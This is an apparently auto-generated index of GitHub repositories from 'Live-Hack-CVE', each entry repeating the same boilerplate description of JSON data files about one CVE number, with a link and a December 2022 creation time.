**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28611 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28611](https://github.com/Live-Hack-CVE/CVE-2020-28611) create time: 2022-12-23T07:54:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28608 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28608](https://github.com/Live-Hack-CVE/CVE-2020-28608) create time: 2022-12-23T07:54:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28607 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28607](https://github.com/Live-Hack-CVE/CVE-2020-28607) create time: 2022-12-23T07:54:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28606 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28606](https://github.com/Live-Hack-CVE/CVE-2020-28606) create time: 2022-12-23T07:54:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28605 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28605](https://github.com/Live-Hack-CVE/CVE-2020-28605) create time: 2022-12-23T07:54:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28604 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28604](https://github.com/Live-Hack-CVE/CVE-2020-28604) create time: 2022-12-23T07:54:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28603 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28603](https://github.com/Live-Hack-CVE/CVE-2020-28603) create time: 2022-12-23T07:54:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28602 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28602](https://github.com/Live-Hack-CVE/CVE-2020-28602) create time: 2022-12-23T07:53:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35632 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35632](https://github.com/Live-Hack-CVE/CVE-2020-35632) create time: 2022-12-23T07:53:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35631 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35631](https://github.com/Live-Hack-CVE/CVE-2020-35631) create time: 2022-12-23T07:53:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-37533 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-37533](https://github.com/Live-Hack-CVE/CVE-2021-37533) create time: 2022-12-23T07:57:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22015 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22015](https://github.com/Live-Hack-CVE/CVE-2021-22015) create time: 2022-12-23T07:49:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34181 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34181](https://github.com/Live-Hack-CVE/CVE-2021-34181) create time: 2022-12-23T07:16:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2641 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2641](https://github.com/Live-Hack-CVE/CVE-2022-2641) create time: 2022-12-23T07:57:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4272 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4272](https://github.com/Live-Hack-CVE/CVE-2022-4272) create time: 2022-12-23T07:57:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46391 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46391](https://github.com/Live-Hack-CVE/CVE-2022-46391) create time: 2022-12-23T07:57:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46410 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46410](https://github.com/Live-Hack-CVE/CVE-2022-46410) create time: 2022-12-23T07:57:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46411 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46411](https://github.com/Live-Hack-CVE/CVE-2022-46411) create time: 2022-12-23T07:57:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46414 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46414](https://github.com/Live-Hack-CVE/CVE-2022-46414) create time: 2022-12-23T07:57:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46413 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46413](https://github.com/Live-Hack-CVE/CVE-2022-46413) create time: 2022-12-23T07:57:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46412 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46412](https://github.com/Live-Hack-CVE/CVE-2022-46412) create time: 2022-12-23T07:57:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44721 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44721](https://github.com/Live-Hack-CVE/CVE-2022-44721) create time: 2022-12-23T07:57:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46405 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46405](https://github.com/Live-Hack-CVE/CVE-2022-46405) create time: 2022-12-23T07:57:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4280 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4280](https://github.com/Live-Hack-CVE/CVE-2022-4280) create time: 2022-12-23T07:57:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43500 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43500](https://github.com/Live-Hack-CVE/CVE-2022-43500) create time: 2022-12-23T07:56:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43499 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43499](https://github.com/Live-Hack-CVE/CVE-2022-43499) create time: 2022-12-23T07:56:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43497 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43497](https://github.com/Live-Hack-CVE/CVE-2022-43497) create time: 2022-12-23T07:56:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43487 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43487](https://github.com/Live-Hack-CVE/CVE-2022-43487) create time: 2022-12-23T07:56:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43479 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43479](https://github.com/Live-Hack-CVE/CVE-2022-43479) create time: 2022-12-23T07:56:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45824 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45824](https://github.com/Live-Hack-CVE/CVE-2022-45824) create time: 2022-12-23T07:56:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45822 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45822](https://github.com/Live-Hack-CVE/CVE-2022-45822) create time: 2022-12-23T07:56:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36944 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36944](https://github.com/Live-Hack-CVE/CVE-2022-36944) create time: 2022-12-23T07:56:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46366 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46366](https://github.com/Live-Hack-CVE/CVE-2022-46366) create time: 2022-12-23T07:56:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43504 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43504](https://github.com/Live-Hack-CVE/CVE-2022-43504) create time: 2022-12-23T07:56:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35730 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35730](https://github.com/Live-Hack-CVE/CVE-2022-35730) create time: 2022-12-23T07:56:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41971 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41971](https://github.com/Live-Hack-CVE/CVE-2022-41971) create time: 2022-12-23T07:56:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41970 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41970](https://github.com/Live-Hack-CVE/CVE-2022-41970) create time: 2022-12-23T07:56:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44212 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44212](https://github.com/Live-Hack-CVE/CVE-2022-44212) create time: 2022-12-23T07:52:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44211 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44211](https://github.com/Live-Hack-CVE/CVE-2022-44211) create time: 2022-12-23T07:52:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44037 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44037](https://github.com/Live-Hack-CVE/CVE-2022-44037) create time: 2022-12-23T07:52:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42718 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42718](https://github.com/Live-Hack-CVE/CVE-2022-42718) create time: 2022-12-23T07:52:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23746 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23746](https://github.com/Live-Hack-CVE/CVE-2022-23746) create time: 2022-12-23T07:52:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2007 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2007](https://github.com/Live-Hack-CVE/CVE-2021-2007) create time: 2022-12-23T06:27:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-4432 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-4432](https://github.com/Live-Hack-CVE/CVE-2016-4432) create time: 2022-12-23T06:33:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-3709 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-3709](https://github.com/Live-Hack-CVE/CVE-2016-3709) create time: 2022-12-23T06:33:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-1000027 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-1000027](https://github.com/Live-Hack-CVE/CVE-2016-1000027) create time: 2022-12-23T06:30:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-9833 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-9833](https://github.com/Live-Hack-CVE/CVE-2017-9833) create time: 2022-12-23T06:28:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3284 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3284](https://github.com/Live-Hack-CVE/CVE-2018-3284) create time: 2022-12-23T07:14:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3174 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3174](https://github.com/Live-Hack-CVE/CVE-2018-3174) create time: 2022-12-23T07:11:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5456 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5456](https://github.com/Live-Hack-CVE/CVE-2019-5456) create time: 2022-12-23T07:15:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4456 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4456](https://github.com/Live-Hack-CVE/CVE-2019-4456) create time: 2022-12-23T07:15:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5455 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5455](https://github.com/Live-Hack-CVE/CVE-2019-5455) create time: 2022-12-23T07:15:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3938 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3938](https://github.com/Live-Hack-CVE/CVE-2019-3938) create time: 2022-12-23T07:15:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3939 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3939](https://github.com/Live-Hack-CVE/CVE-2019-3939) create time: 2022-12-23T07:15:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3935 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3935](https://github.com/Live-Hack-CVE/CVE-2019-3935) create time: 2022-12-23T07:15:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3932 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3932](https://github.com/Live-Hack-CVE/CVE-2019-3932) create time: 2022-12-23T07:15:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4337 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4337](https://github.com/Live-Hack-CVE/CVE-2019-4337) create time: 2022-12-23T07:15:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4336 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4336](https://github.com/Live-Hack-CVE/CVE-2019-4336) create time: 2022-12-23T07:14:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4297 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4297](https://github.com/Live-Hack-CVE/CVE-2019-4297) create time: 2022-12-23T07:14:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17566 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17566](https://github.com/Live-Hack-CVE/CVE-2019-17566) create time: 2022-12-23T07:14:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2614 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2614](https://github.com/Live-Hack-CVE/CVE-2019-2614) create time: 2022-12-23T07:10:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4520 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4520](https://github.com/Live-Hack-CVE/CVE-2019-4520) create time: 2022-12-23T06:31:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4538 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4538](https://github.com/Live-Hack-CVE/CVE-2019-4538) create time: 2022-12-23T06:31:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4539 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4539](https://github.com/Live-Hack-CVE/CVE-2019-4539) create time: 2022-12-23T06:30:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4495 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4495](https://github.com/Live-Hack-CVE/CVE-2019-4495) create time: 2022-12-23T06:30:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4542 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4542](https://github.com/Live-Hack-CVE/CVE-2019-4542) create time: 2022-12-23T06:30:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4422 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4422](https://github.com/Live-Hack-CVE/CVE-2019-4422) create time: 2022-12-23T06:30:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4549 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4549](https://github.com/Live-Hack-CVE/CVE-2019-4549) create time: 2022-12-23T06:30:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4497 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4497](https://github.com/Live-Hack-CVE/CVE-2019-4497) create time: 2022-12-23T06:30:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4441 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4441](https://github.com/Live-Hack-CVE/CVE-2019-4441) create time: 2022-12-23T06:30:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4564 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4564](https://github.com/Live-Hack-CVE/CVE-2019-4564) create time: 2022-12-23T06:30:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-18391 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-18391](https://github.com/Live-Hack-CVE/CVE-2019-18391) create time: 2022-12-23T06:29:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-18389 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-18389](https://github.com/Live-Hack-CVE/CVE-2019-18389) create time: 2022-12-23T06:29:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-18388 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-18388](https://github.com/Live-Hack-CVE/CVE-2019-18388) create time: 2022-12-23T06:29:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-18390 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-18390](https://github.com/Live-Hack-CVE/CVE-2019-18390) create time: 2022-12-23T06:29:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4515 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4515](https://github.com/Live-Hack-CVE/CVE-2019-4515) create time: 2022-12-23T06:28:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4566 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4566](https://github.com/Live-Hack-CVE/CVE-2019-4566) create time: 2022-12-23T06:28:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4571 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4571](https://github.com/Live-Hack-CVE/CVE-2019-4571) create time: 2022-12-23T06:28:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4423 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4423](https://github.com/Live-Hack-CVE/CVE-2019-4423) create time: 2022-12-23T06:28:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14044 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14044](https://github.com/Live-Hack-CVE/CVE-2020-14044) create time: 2022-12-23T07:16:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14043 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14043](https://github.com/Live-Hack-CVE/CVE-2020-14043) create time: 2022-12-23T07:16:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13101 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13101](https://github.com/Live-Hack-CVE/CVE-2020-13101) create time: 2022-12-23T07:16:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14367 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14367](https://github.com/Live-Hack-CVE/CVE-2020-14367) create time: 2022-12-23T07:16:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24032 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24032](https://github.com/Live-Hack-CVE/CVE-2020-24032) create time: 2022-12-23T07:15:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24916 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24916](https://github.com/Live-Hack-CVE/CVE-2020-24916) create time: 2022-12-23T07:15:17Z

